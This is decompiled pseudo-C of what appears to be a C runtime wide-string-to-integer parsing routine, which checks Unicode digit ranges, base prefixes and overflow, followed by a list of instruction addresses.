                                                                                                                                                                                                                                                        				intOrPtr _v96;
                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                                                                                                        				intOrPtr _v116;
                                                                                                                                                                                                                                                        				intOrPtr _v120;
                                                                                                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                                                                                                        				intOrPtr _v128;
                                                                                                                                                                                                                                                        				intOrPtr _v132;
                                                                                                                                                                                                                                                        				intOrPtr _v136;
                                                                                                                                                                                                                                                        				intOrPtr _v140;
                                                                                                                                                                                                                                                        				intOrPtr _v144;
                                                                                                                                                                                                                                                        				intOrPtr _v148;
                                                                                                                                                                                                                                                        				intOrPtr _v152;
                                                                                                                                                                                                                                                        				intOrPtr _v156;
                                                                                                                                                                                                                                                        				intOrPtr _v160;
                                                                                                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                                                                                                        				intOrPtr _v168;
                                                                                                                                                                                                                                                        				long long _v176;
                                                                                                                                                                                                                                                        				long long _v184;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                                                                        				signed int _t169;
                                                                                                                                                                                                                                                        				signed short _t208;
                                                                                                                                                                                                                                                        				signed short _t209;
                                                                                                                                                                                                                                                        				signed int _t210;
                                                                                                                                                                                                                                                        				signed int _t245;
                                                                                                                                                                                                                                                        				intOrPtr _t259;
                                                                                                                                                                                                                                                        				signed int _t260;
                                                                                                                                                                                                                                                        				signed int _t264;
                                                                                                                                                                                                                                                        				signed int _t265;
                                                                                                                                                                                                                                                        				signed int _t268;
                                                                                                                                                                                                                                                        				signed short* _t391;
                                                                                                                                                                                                                                                        				signed short* _t392;
                                                                                                                                                                                                                                                        				signed short* _t393;
                                                                                                                                                                                                                                                        				signed short* _t395;
                                                                                                                                                                                                                                                        				signed short** _t396;
                                                                                                                                                                                                                                                        				long long _t397;
                                                                                                                                                                                                                                                        				long long* _t400;
                                                                                                                                                                                                                                                        				signed short* _t401;
                                                                                                                                                                                                                                                        				long long* _t405;
                                                                                                                                                                                                                                                        				long long* _t406;
                                                                                                                                                                                                                                                        				long long* _t407;
                                                                                                                                                                                                                                                        				signed short** _t408;
                                                                                                                                                                                                                                                        				void* _t409;
                                                                                                                                                                                                                                                        				long long _t410;
                                                                                                                                                                                                                                                        				signed short* _t415;
                                                                                                                                                                                                                                                        				signed short* _t416;
                                                                                                                                                                                                                                                        				void* _t418;
                                                                                                                                                                                                                                                        				void* _t419;
                                                                                                                                                                                                                                                        				long long _t420;
                                                                                                                                                                                                                                                        				signed short* _t421;
                                                                                                                                                                                                                                                        				intOrPtr _t422;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t419 = __r11;
                                                                                                                                                                                                                                                        				_t418 = __r10;
                                                                                                                                                                                                                                                        				_t414 = __r8;
                                                                                                                                                                                                                                                        				_t405 = __rdx;
                                                                                                                                                                                                                                                        				_t397 = __rbx;
                                                                                                                                                                                                                                                        				_a24 = __rbx;
                                                                                                                                                                                                                                                        				_a8 = __rcx;
                                                                                                                                                                                                                                                        				_t420 =  *((intOrPtr*)(__rdx));
                                                                                                                                                                                                                                                        				_t265 = r9b & 0xffffffff;
                                                                                                                                                                                                                                                        				r15d = r8d;
                                                                                                                                                                                                                                                        				_v72 = _t420;
                                                                                                                                                                                                                                                        				_t408 = __rdx;
                                                                                                                                                                                                                                                        				if (_t420 != 0) goto 0xe5ac92ae;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				goto 0xe5ac92e0;
                                                                                                                                                                                                                                                        				if (r15d == 0) goto 0xe5ac92f8;
                                                                                                                                                                                                                                                        				_t4 = _t414 - 2; // -2
                                                                                                                                                                                                                                                        				if (_t4 - 0x22 <= 0) goto 0xe5ac92f8;
                                                                                                                                                                                                                                                        				_v176 = __rcx;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                                                                                                                                                                        				_v184 = _t410;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __rbx, __rcx, __rdx, _t409, _t410, __r8);
                                                                                                                                                                                                                                                        				_t400 = _t408[1];
                                                                                                                                                                                                                                                        				if (_t400 == 0) goto 0xe5ac994a;
                                                                                                                                                                                                                                                        				 *_t400 =  *_t408;
                                                                                                                                                                                                                                                        				goto 0xe5ac994a;
                                                                                                                                                                                                                                                        				_t10 = _t420 + 2; // 0x2
                                                                                                                                                                                                                                                        				 *_t405 = _t10;
                                                                                                                                                                                                                                                        				r14d = 0;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t400 + 0x28)) != bpl) goto 0xe5ac9322;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20(_t10, _t397, _t400, _t409);
                                                                                                                                                                                                                                                        				goto 0xe5ac9322;
                                                                                                                                                                                                                                                        				_t389 =  *_t408;
                                                                                                                                                                                                                                                        				 *_t408 =  &(( *_t408)[1]);
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC79DC( *_t389 & 0xffff, 8, _t397, _t400) != 0) goto 0xe5ac9315;
                                                                                                                                                                                                                                                        				_t267 =  !=  ? _t265 : _t265 | 0x00000002;
                                                                                                                                                                                                                                                        				_t12 = _t397 - 0x2b; // -43
                                                                                                                                                                                                                                                        				if ((0x0000fffd & _t12) != 0) goto 0xe5ac9359;
                                                                                                                                                                                                                                                        				_t391 =  *_t408;
                                                                                                                                                                                                                                                        				_t208 =  *_t391 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t392 =  &(_t391[1]);
                                                                                                                                                                                                                                                        				 *_t408 = _t392;
                                                                                                                                                                                                                                                        				_a16 = 0xa70;
                                                                                                                                                                                                                                                        				_v168 = 0xae6;
                                                                                                                                                                                                                                                        				_v164 = 0xaf0;
                                                                                                                                                                                                                                                        				_v160 = 0xb66;
                                                                                                                                                                                                                                                        				r8d = 0x660;
                                                                                                                                                                                                                                                        				_v156 = 0xb70;
                                                                                                                                                                                                                                                        				_t20 = _t392 - 0x80; // 0x5e0
                                                                                                                                                                                                                                                        				r11d = _t20;
                                                                                                                                                                                                                                                        				_v152 = 0xc66;
                                                                                                                                                                                                                                                        				r9d = 0x6f0;
                                                                                                                                                                                                                                                        				_v148 = 0xc70;
                                                                                                                                                                                                                                                        				r10d = 0x966;
                                                                                                                                                                                                                                                        				_v144 = 0xce6;
                                                                                                                                                                                                                                                        				_v140 = 0xcf0;
                                                                                                                                                                                                                                                        				_v136 = 0xd66;
                                                                                                                                                                                                                                                        				_v132 = 0xd70;
                                                                                                                                                                                                                                                        				_v128 = 0xe50;
                                                                                                                                                                                                                                                        				_v124 = 0xe5a;
                                                                                                                                                                                                                                                        				_v120 = 0xed0;
                                                                                                                                                                                                                                                        				_v116 = 0xeda;
                                                                                                                                                                                                                                                        				_v112 = 0xf20;
                                                                                                                                                                                                                                                        				_v108 = 0xf2a;
                                                                                                                                                                                                                                                        				_v104 = 0x1040;
                                                                                                                                                                                                                                                        				_v100 = 0x104a;
                                                                                                                                                                                                                                                        				_v96 = 0x17e0;
                                                                                                                                                                                                                                                        				_v92 = 0x17ea;
                                                                                                                                                                                                                                                        				_v88 = 0x1810;
                                                                                                                                                                                                                                                        				_v84 = 0xff1a;
                                                                                                                                                                                                                                                        				_v80 = 0x19;
                                                                                                                                                                                                                                                        				if ((r15d & 0xffffffef) != 0) goto 0xe5ac9699;
                                                                                                                                                                                                                                                        				if (_t208 - 0x30 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - 0x3a >= 0) goto 0xe5ac9470;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - 0xff10 >= 0) goto 0xe5ac960d;
                                                                                                                                                                                                                                                        				if (_t208 - r8w < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - 0x66a >= 0) goto 0xe5ac9498;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - r9w < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - 0x6fa >= 0) goto 0xe5ac94b7;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - r10w < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - 0x970 >= 0) goto 0xe5ac94d6;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - r11w < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - 0x9f0 >= 0) goto 0xe5ac94f5;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - (_t208 & 0x0000ffff) - r11d < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _a16 >= 0) goto 0xe5ac9515;
                                                                                                                                                                                                                                                        				goto 0xe5ac961c;
                                                                                                                                                                                                                                                        				if (_t208 - _v168 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v164 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v160 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v156 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v152 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v148 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v144 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v140 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v136 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v132 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v128 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v124 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v120 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v116 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v112 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v108 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v104 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v100 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v96 < 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if (_t208 - _v92 < 0) goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if ((_t208 & 0x0000ffff) - _v88 - 9 > 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				goto 0xe5ac9466;
                                                                                                                                                                                                                                                        				if (_t208 - _v84 >= 0) goto 0xe5ac9621;
                                                                                                                                                                                                                                                        				if ((_t208 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xe5ac9647;
                                                                                                                                                                                                                                                        				_t259 = _v80;
                                                                                                                                                                                                                                                        				_t66 = _t400 - 0x41; // 0x6af
                                                                                                                                                                                                                                                        				_t67 = _t400 - 0x61; // 0x68f
                                                                                                                                                                                                                                                        				_t163 = _t67;
                                                                                                                                                                                                                                                        				if (_t66 - _t259 <= 0) goto 0xe5ac963d;
                                                                                                                                                                                                                                                        				if (_t163 - _t259 > 0) goto 0xe5ac96f3;
                                                                                                                                                                                                                                                        				if (_t163 - _t259 > 0) goto 0xe5ac9644;
                                                                                                                                                                                                                                                        				_t68 = _t400 - 0x37; // 0x5d9
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				if (_t68 != 0) goto 0xe5ac96f6;
                                                                                                                                                                                                                                                        				_t401 =  *_t408;
                                                                                                                                                                                                                                                        				r9d = 0xffdf;
                                                                                                                                                                                                                                                        				_t260 =  *_t401 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t69 =  &(_t401[1]); // 0xffe1
                                                                                                                                                                                                                                                        				_t415 = _t69;
                                                                                                                                                                                                                                                        				 *_t408 = _t415;
                                                                                                                                                                                                                                                        				_t70 = _t405 - 0x58; // -63
                                                                                                                                                                                                                                                        				if ((r9w & _t70) == 0) goto 0xe5ac96d7;
                                                                                                                                                                                                                                                        				 *_t408 = _t401;
                                                                                                                                                                                                                                                        				_t73 = _t418 + 8; // 0x8
                                                                                                                                                                                                                                                        				_t167 =  !=  ? r15d : _t73;
                                                                                                                                                                                                                                                        				r15d =  !=  ? r15d : _t73;
                                                                                                                                                                                                                                                        				if (_t260 == 0) goto 0xe5ac969c;
                                                                                                                                                                                                                                                        				if ( *_t401 == _t260) goto 0xe5ac969c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t392);
                                                                                                                                                                                                                                                        				 *_t392 = 0x16;
                                                                                                                                                                                                                                                        				_t169 = E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				r11d = 0x61;
                                                                                                                                                                                                                                                        				r9d = (_t169 | 0xffffffff) / r15d;
                                                                                                                                                                                                                                                        				r13d = 0xff10;
                                                                                                                                                                                                                                                        				_t78 = _t419 - 0x31; // 0x5af
                                                                                                                                                                                                                                                        				r12d = _t78;
                                                                                                                                                                                                                                                        				if (_t208 - r12w < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t208 - 0x3a >= 0) goto 0xe5ac96fd;
                                                                                                                                                                                                                                                        				goto 0xe5ac9886;
                                                                                                                                                                                                                                                        				_t209 =  *_t415 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t79 =  &(_t415[1]); // 0xffe3
                                                                                                                                                                                                                                                        				_t393 = _t79;
                                                                                                                                                                                                                                                        				 *_t408 = _t393;
                                                                                                                                                                                                                                                        				_t173 =  !=  ? r15d : 0x10;
                                                                                                                                                                                                                                                        				r15d =  !=  ? r15d : 0x10;
                                                                                                                                                                                                                                                        				goto 0xe5ac969c;
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				goto 0xe5ac96e7;
                                                                                                                                                                                                                                                        				if (_t209 - r13w >= 0) goto 0xe5ac9876;
                                                                                                                                                                                                                                                        				if (_t209 - 0x660 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - 0x66a >= 0) goto 0xe5ac9724;
                                                                                                                                                                                                                                                        				goto 0xe5ac9886;
                                                                                                                                                                                                                                                        				if (_t209 - 0x6f0 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				_t80 =  &(_t393[5]); // 0x6fa
                                                                                                                                                                                                                                                        				if (_t209 - _t80 >= 0) goto 0xe5ac9744;
                                                                                                                                                                                                                                                        				goto 0xe5ac9886;
                                                                                                                                                                                                                                                        				if (_t209 - 0x966 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				_t81 =  &(_t393[5]); // 0x970
                                                                                                                                                                                                                                                        				if (_t209 - _t81 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				_t82 =  &(_t401[0x3b]); // 0x9e6
                                                                                                                                                                                                                                                        				if (_t209 - _t82 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				_t83 =  &(_t393[5]); // 0x9f0
                                                                                                                                                                                                                                                        				if (_t209 - _t83 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				_t84 =  &(_t401[0x3b]); // 0xa66
                                                                                                                                                                                                                                                        				if (_t209 - _t84 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _a16 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v168 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v164 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v160 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v156 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v152 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v148 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v144 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v140 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v136 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v132 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v128 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v124 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v120 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v116 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v112 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v108 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v104 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v100 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if (_t209 - _v96 < 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if (_t209 - _v92 < 0) goto 0xe5ac973a;
                                                                                                                                                                                                                                                        				if ((_t209 & 0x0000ffff) - _v88 - 9 > 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				goto 0xe5ac9886;
                                                                                                                                                                                                                                                        				if (_t209 - _v84 >= 0) goto 0xe5ac988b;
                                                                                                                                                                                                                                                        				if ((_t209 & 0x0000ffff) - r13d != 0xffffffff) goto 0xe5ac98bf;
                                                                                                                                                                                                                                                        				_t245 = _t209 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t245 - 0x41 < 0) goto 0xe5ac9898;
                                                                                                                                                                                                                                                        				if (_t245 - 0x5a <= 0) goto 0xe5ac98a3;
                                                                                                                                                                                                                                                        				if (_t245 - r11d < 0) goto 0xe5ac98bc;
                                                                                                                                                                                                                                                        				if (_t209 - 0x7a > 0) goto 0xe5ac98bc;
                                                                                                                                                                                                                                                        				if ((_t209 & 0x0000ffff) - r11w - _v80 > 0) goto 0xe5ac98b7;
                                                                                                                                                                                                                                                        				goto 0xe5ac98bf;
                                                                                                                                                                                                                                                        				_t416 =  *_t408;
                                                                                                                                                                                                                                                        				if ((_t245 + 0x1ffffffa9 | 0xffffffff) - r15d >= 0) goto 0xe5ac98ff;
                                                                                                                                                                                                                                                        				_t210 =  *_t416 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t264 = _t393 + _t401;
                                                                                                                                                                                                                                                        				r14d = _t264;
                                                                                                                                                                                                                                                        				_t114 =  &(_t416[1]); // 0x2
                                                                                                                                                                                                                                                        				 *_t408 = _t114;
                                                                                                                                                                                                                                                        				_t268 = ( !=  ? _t265 : _t265 | 0x00000002) | (r10d & 0xffffff00 | _t264 - r14d * r15d > 0x00000000 | r10d & 0xffffff00 | r14d - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                                                                                                                                                                        				goto 0xe5ac96bc;
                                                                                                                                                                                                                                                        				_t422 = _a8;
                                                                                                                                                                                                                                                        				_t116 = _t416 - 2; // -2
                                                                                                                                                                                                                                                        				_t395 = _t116;
                                                                                                                                                                                                                                                        				_t421 = _v72;
                                                                                                                                                                                                                                                        				 *_t408 = _t395;
                                                                                                                                                                                                                                                        				if (_t210 == 0) goto 0xe5ac9935;
                                                                                                                                                                                                                                                        				if ( *_t395 == _t210) goto 0xe5ac9935;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t395);
                                                                                                                                                                                                                                                        				 *_t395 = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				if ((sil & 0x00000008) != 0) goto 0xe5ac9951;
                                                                                                                                                                                                                                                        				_t396 = _t408[1];
                                                                                                                                                                                                                                                        				 *_t408 = _t421;
                                                                                                                                                                                                                                                        				if (_t396 == 0) goto 0xe5ac994a;
                                                                                                                                                                                                                                                        				 *_t396 = _t421;
                                                                                                                                                                                                                                                        				goto 0xe5ac99e3;
                                                                                                                                                                                                                                                        				r8d = 0x80000000;
                                                                                                                                                                                                                                                        				_t121 = _t416 - 1; // -1
                                                                                                                                                                                                                                                        				r9d = _t121;
                                                                                                                                                                                                                                                        				if ((sil & 0x00000004) == 0) goto 0xe5ac996a;
                                                                                                                                                                                                                                                        				goto 0xe5ac9988;
                                                                                                                                                                                                                                                        				if ((sil & 0x00000001) == 0) goto 0xe5ac99c9;
                                                                                                                                                                                                                                                        				if ((bpl & sil) == 0) goto 0xe5ac997c;
                                                                                                                                                                                                                                                        				if (r14d - r8d <= 0) goto 0xe5ac99ce;
                                                                                                                                                                                                                                                        				goto 0xe5ac9981;
                                                                                                                                                                                                                                                        				if (r14d - r9d <= 0) goto 0xe5ac99d1;
                                                                                                                                                                                                                                                        				 *((char*)(_t422 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t422 + 0x2c)) = 0x22;
                                                                                                                                                                                                                                                        				if ((_t268 & 0x00000001) != 0) goto 0xe5ac99a1;
                                                                                                                                                                                                                                                        				r14d = r14d | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac99d1;
                                                                                                                                                                                                                                                        				_t406 = _t408[1];
                                                                                                                                                                                                                                                        				if ((0x00000002 & _t268) == 0) goto 0xe5ac99b9;
                                                                                                                                                                                                                                                        				if (_t406 == 0) goto 0xe5ac99b4;
                                                                                                                                                                                                                                                        				 *_t406 =  *_t408;
                                                                                                                                                                                                                                                        				goto 0xe5ac99e3;
                                                                                                                                                                                                                                                        				if (_t406 == 0) goto 0xe5ac99c4;
                                                                                                                                                                                                                                                        				 *_t406 =  *_t408;
                                                                                                                                                                                                                                                        				goto 0xe5ac99e3;
                                                                                                                                                                                                                                                        				if ((bpl & sil) == 0) goto 0xe5ac99d1;
                                                                                                                                                                                                                                                        				r14d =  ~r14d;
                                                                                                                                                                                                                                                        				_t407 = _t408[1];
                                                                                                                                                                                                                                                        				if (_t407 == 0) goto 0xe5ac99e0;
                                                                                                                                                                                                                                                        				 *_t407 =  *_t408;
                                                                                                                                                                                                                                                        				return r14d;
                                                                                                                                                                                                                                                        			}































































                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9264
                                                                                                                                                                                                                                                        0x7ff6e5ac9269
                                                                                                                                                                                                                                                        0x7ff6e5ac9280
                                                                                                                                                                                                                                                        0x7ff6e5ac9285
                                                                                                                                                                                                                                                        0x7ff6e5ac9289
                                                                                                                                                                                                                                                        0x7ff6e5ac928c
                                                                                                                                                                                                                                                        0x7ff6e5ac9294
                                                                                                                                                                                                                                                        0x7ff6e5ac929a
                                                                                                                                                                                                                                                        0x7ff6e5ac929c
                                                                                                                                                                                                                                                        0x7ff6e5ac92a1
                                                                                                                                                                                                                                                        0x7ff6e5ac92a7
                                                                                                                                                                                                                                                        0x7ff6e5ac92ac
                                                                                                                                                                                                                                                        0x7ff6e5ac92b1
                                                                                                                                                                                                                                                        0x7ff6e5ac92b3
                                                                                                                                                                                                                                                        0x7ff6e5ac92ba
                                                                                                                                                                                                                                                        0x7ff6e5ac92bc
                                                                                                                                                                                                                                                        0x7ff6e5ac92c1
                                                                                                                                                                                                                                                        0x7ff6e5ac92c4
                                                                                                                                                                                                                                                        0x7ff6e5ac92c8
                                                                                                                                                                                                                                                        0x7ff6e5ac92cb
                                                                                                                                                                                                                                                        0x7ff6e5ac92d6
                                                                                                                                                                                                                                                        0x7ff6e5ac92db
                                                                                                                                                                                                                                                        0x7ff6e5ac92e0
                                                                                                                                                                                                                                                        0x7ff6e5ac92e7
                                                                                                                                                                                                                                                        0x7ff6e5ac92f0
                                                                                                                                                                                                                                                        0x7ff6e5ac92f3
                                                                                                                                                                                                                                                        0x7ff6e5ac92fd
                                                                                                                                                                                                                                                        0x7ff6e5ac9302
                                                                                                                                                                                                                                                        0x7ff6e5ac9305
                                                                                                                                                                                                                                                        0x7ff6e5ac930c
                                                                                                                                                                                                                                                        0x7ff6e5ac930e
                                                                                                                                                                                                                                                        0x7ff6e5ac9313
                                                                                                                                                                                                                                                        0x7ff6e5ac9315
                                                                                                                                                                                                                                                        0x7ff6e5ac931f
                                                                                                                                                                                                                                                        0x7ff6e5ac9331
                                                                                                                                                                                                                                                        0x7ff6e5ac9341
                                                                                                                                                                                                                                                        0x7ff6e5ac9344
                                                                                                                                                                                                                                                        0x7ff6e5ac934a
                                                                                                                                                                                                                                                        0x7ff6e5ac934c
                                                                                                                                                                                                                                                        0x7ff6e5ac934f
                                                                                                                                                                                                                                                        0x7ff6e5ac9352
                                                                                                                                                                                                                                                        0x7ff6e5ac9356
                                                                                                                                                                                                                                                        0x7ff6e5ac9359
                                                                                                                                                                                                                                                        0x7ff6e5ac9369
                                                                                                                                                                                                                                                        0x7ff6e5ac9376
                                                                                                                                                                                                                                                        0x7ff6e5ac9383
                                                                                                                                                                                                                                                        0x7ff6e5ac938b
                                                                                                                                                                                                                                                        0x7ff6e5ac9391
                                                                                                                                                                                                                                                        0x7ff6e5ac9399
                                                                                                                                                                                                                                                        0x7ff6e5ac9399
                                                                                                                                                                                                                                                        0x7ff6e5ac939d
                                                                                                                                                                                                                                                        0x7ff6e5ac93a5
                                                                                                                                                                                                                                                        0x7ff6e5ac93ab
                                                                                                                                                                                                                                                        0x7ff6e5ac93b3
                                                                                                                                                                                                                                                        0x7ff6e5ac93b9
                                                                                                                                                                                                                                                        0x7ff6e5ac93c1
                                                                                                                                                                                                                                                        0x7ff6e5ac93c9
                                                                                                                                                                                                                                                        0x7ff6e5ac93d1
                                                                                                                                                                                                                                                        0x7ff6e5ac93d9
                                                                                                                                                                                                                                                        0x7ff6e5ac93e1
                                                                                                                                                                                                                                                        0x7ff6e5ac93e9
                                                                                                                                                                                                                                                        0x7ff6e5ac93f1
                                                                                                                                                                                                                                                        0x7ff6e5ac93f9
                                                                                                                                                                                                                                                        0x7ff6e5ac9401
                                                                                                                                                                                                                                                        0x7ff6e5ac9409
                                                                                                                                                                                                                                                        0x7ff6e5ac9411
                                                                                                                                                                                                                                                        0x7ff6e5ac9419
                                                                                                                                                                                                                                                        0x7ff6e5ac9421
                                                                                                                                                                                                                                                        0x7ff6e5ac9429
                                                                                                                                                                                                                                                        0x7ff6e5ac9434
                                                                                                                                                                                                                                                        0x7ff6e5ac943f
                                                                                                                                                                                                                                                        0x7ff6e5ac9451
                                                                                                                                                                                                                                                        0x7ff6e5ac945a
                                                                                                                                                                                                                                                        0x7ff6e5ac9464
                                                                                                                                                                                                                                                        0x7ff6e5ac946b
                                                                                                                                                                                                                                                        0x7ff6e5ac9473
                                                                                                                                                                                                                                                        0x7ff6e5ac947d
                                                                                                                                                                                                                                                        0x7ff6e5ac948b
                                                                                                                                                                                                                                                        0x7ff6e5ac9493
                                                                                                                                                                                                                                                        0x7ff6e5ac949c
                                                                                                                                                                                                                                                        0x7ff6e5ac94aa
                                                                                                                                                                                                                                                        0x7ff6e5ac94b2
                                                                                                                                                                                                                                                        0x7ff6e5ac94bb
                                                                                                                                                                                                                                                        0x7ff6e5ac94c9
                                                                                                                                                                                                                                                        0x7ff6e5ac94d1
                                                                                                                                                                                                                                                        0x7ff6e5ac94da
                                                                                                                                                                                                                                                        0x7ff6e5ac94e8
                                                                                                                                                                                                                                                        0x7ff6e5ac94f0
                                                                                                                                                                                                                                                        0x7ff6e5ac94f8
                                                                                                                                                                                                                                                        0x7ff6e5ac9506
                                                                                                                                                                                                                                                        0x7ff6e5ac9510
                                                                                                                                                                                                                                                        0x7ff6e5ac951c
                                                                                                                                                                                                                                                        0x7ff6e5ac9527
                                                                                                                                                                                                                                                        0x7ff6e5ac9534
                                                                                                                                                                                                                                                        0x7ff6e5ac953f
                                                                                                                                                                                                                                                        0x7ff6e5ac954c
                                                                                                                                                                                                                                                        0x7ff6e5ac9557
                                                                                                                                                                                                                                                        0x7ff6e5ac9564
                                                                                                                                                                                                                                                        0x7ff6e5ac956f
                                                                                                                                                                                                                                                        0x7ff6e5ac957c
                                                                                                                                                                                                                                                        0x7ff6e5ac9587
                                                                                                                                                                                                                                                        0x7ff6e5ac9594
                                                                                                                                                                                                                                                        0x7ff6e5ac959f
                                                                                                                                                                                                                                                        0x7ff6e5ac95ac
                                                                                                                                                                                                                                                        0x7ff6e5ac95b3
                                                                                                                                                                                                                                                        0x7ff6e5ac95c0
